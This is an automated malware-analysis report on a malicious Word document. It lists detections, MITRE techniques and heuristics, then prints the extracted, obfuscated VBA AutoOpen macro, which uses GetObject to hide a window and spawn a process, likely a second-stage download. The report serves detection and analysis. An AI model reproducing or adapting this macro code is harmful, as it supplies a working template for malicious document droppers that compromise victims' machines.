Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros. The 'autoopen' macro is present and uses a GetObject call, which is a common technique for executing arbitrary code or downloading additional payloads. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature. The VBA script's obfuscated nature and the use of GetObject indicate an attempt to download and execute a second-stage payload.
Heuristics (7)
- ClamAV: Doc.Malware.Dsdu-6904730-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dsdu-6904730-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12517 bytes | 7182e96b62d45f3f50881cb376e52702440886c874998b255422d19ae5bd6034 |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "nABUUAkX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "KcxA1D_o"
Attribute VB_Base = "0{5A166FBB-4DE2-4498-B1A6-6FE4E60F4595}{66B7C25F-D9FA-4F83-BB08-F9B09CA772BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MA_AcAcA"
Sub autoopen()
On Error Resume Next
If lGXZUxU = Hk_1DA_ Then
WX_Ao41B = (633637079)
zAAGAc = (qUAADA * CInt(939119851 _
+ Atn(631635569 * SZw_GQU)) + p4XBDBA + CDbl(QAGkBA - Sqr(NAUQAc / _
CBool(694363531 / 395298971) + oZAAA_ - Rnd(W4QQA1A4))) * 316527312 * 790820533)
vAADAC = (780110503)
End If
If iAZoAB = WUZAZA Then
UCxQ_BB = (869701008)
ZQA_AAB = (w1GAXcAC * CInt(362757127 _
+ Atn(984781346 * PxBkBBA)) + t4AUDA + CDbl(doAUA4AU - Sqr(oB4ZoABX / _
CBool(766367436 / 54354063) + DAAUDGDA - Rnd(ocAkAA))) * 867914749 * 409910776)
jAAwUUA = (176912204)
End If
If N_wkAD = PB4_AA Then
BBCDcAD = (41241393)
MBAA1CDC = (VAAAAAAD * CInt(715117475 _
+ Atn(6170625 * bBwB4Zw)) + JAGkAB + CDbl(iU_wAk - Sqr(u1AAAAAw / _
CBool(790080207 / 57410608) + mABAGQwA - Rnd(iQABA41w))) * 257822242 * 437275507)
lXoxooZA = (340432783)
End If
Set TD4UAQU = GetObject(a_DAxDX + KcxA1D_o.qDQAcUA + KUGcAQ_)
If zoAQAc = JAAAkoBo Then
A4QcZZ = (693632950)
ODAQAZA = (hDAAXQG * CInt(449684569 _
+ Atn(392118058 * GAAXBCCG)) + oD_AADA + CDbl(rAXxAQB - Sqr(zAADUAA / _
CBool(110922244 / 7334196) + uQUUXo - Rnd(kkXAAokA))) * 937414345 * 146116786)
zAZGA1G = (371339082)
End If
If SBQoUAAZ = wXXBco Then
Zw4BA4Aw = (54592852)
cAQAxD = (kQcABABU * CInt(214971490 _
+ Atn(865505036 * Ww1_AAQ)) + rXBx1UQX + CDbl(nAoAAQ - Sqr(wUwAAU / _
CBool(496875445 / 773933083) + P_oAADB - Rnd(o1AAXCU))) * 586595010 * 383261949)
zCxkBXG = (6228362)
End If
If OwQQAQc = B_4UCZA Then
McA_wUQk = (390997271)
oUAABZCU = (skGDBQwC * CInt(397612839 _
+ Atn(672760152 * VCQQAxDx)) + kB41Ao + CDbl(cQxoUBC - Sqr(tAXc4QC / _
CBool(310717484 / 368970770) + jAxU4U - Rnd(mAUAUAkA))) * 820808914 * 521724896)
rGD_UxAD = (68443277)
End If
TD4UAQU.ShowWindow = 24798 - 24798
If LQkBAB4G = JA4oAkw Then
OwAkAQ = (191260931)
F_xGA_Dw = (vUA4Aoox * CInt(470433065 _
+ Atn(709687538 * NCQDBAGA)) + FAB4UZAk + CDbl(qQAAA4 - Sqr(uZUxcA / _
CBool(191594514 / 60853999) + uABCGA4 - Rnd(d_UwAA))) * 687073135 * 33650344)
WACA_A = (525127981)
End If
If wAAoQ1A = KUDZkAxB Then
oxGwABCA = (852264247)
mkAkw_Z = (bAxAZcc * CInt(397263679 _
+ Atn(88082441 * cZxxQ1)) + BB_A4Z_ + CDbl(To_ZAZwQ - Sqr(l1BQUo / _
CBool(593689338 / 921681185) + V4AABX - Rnd(JABAUA))) * 31396914 * 192571848)
vcQZQc_D = (169692709)
End If
GetObject(PUABAwAB + KcxA1D_o.mAABDZk1 + nUwBBAZ1). _
Create@ Pw_AZQ + KcxA1D_o.ucZBDDX + FQkAQ1A + KcxA1D_o.EAAADUA + sCkAkX + KcxA1D_o.WAAADUkA + lQUXUC, zQDC1D_, TD4UAQU, XAA4XC
If vAQAABoc = bQcxAww Then
OQDCAA = (777080703)
UwBBAAD = (fAAowZU1 * CInt(757616636 _
+ Atn(193600679 * AA_AkAA)) + SBUQBX + CDbl(sGAxDAAU - Sqr(iBAABD / _
CBool(812933558 / 398830150) + pAcABAA - Rnd(SGA44oQ))) * 613494098 * 527913501)
CDUxAo = (983808198)
End If
If s_BZXAkX = YA1xAZUG Then
X1AA4k = (318643594)
T_4DAxow = (vAkZQZQ_ * CInt(795498079 _
+ Atn(930015675 * Y1AU4UAo)) + bAAZoA + CDbl(NAZBCA - Sqr(OQAAQABQ / _
CBool(988436226 / 296376060) + WZAxAQ - Rnd(J1Ao4QGB))) * 314002354 * 636511629)
DAkAAA4 = (882903708)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/5cf2623a141a4b5da865f2f0a95cca98.bin
' ===============================================================================
' Module streams:
' Macros/VBA/nABUUAkX - 1106 bytes
' Macros/VBA/KcxA1D_o - 1159 bytes
' Macr
... (truncated)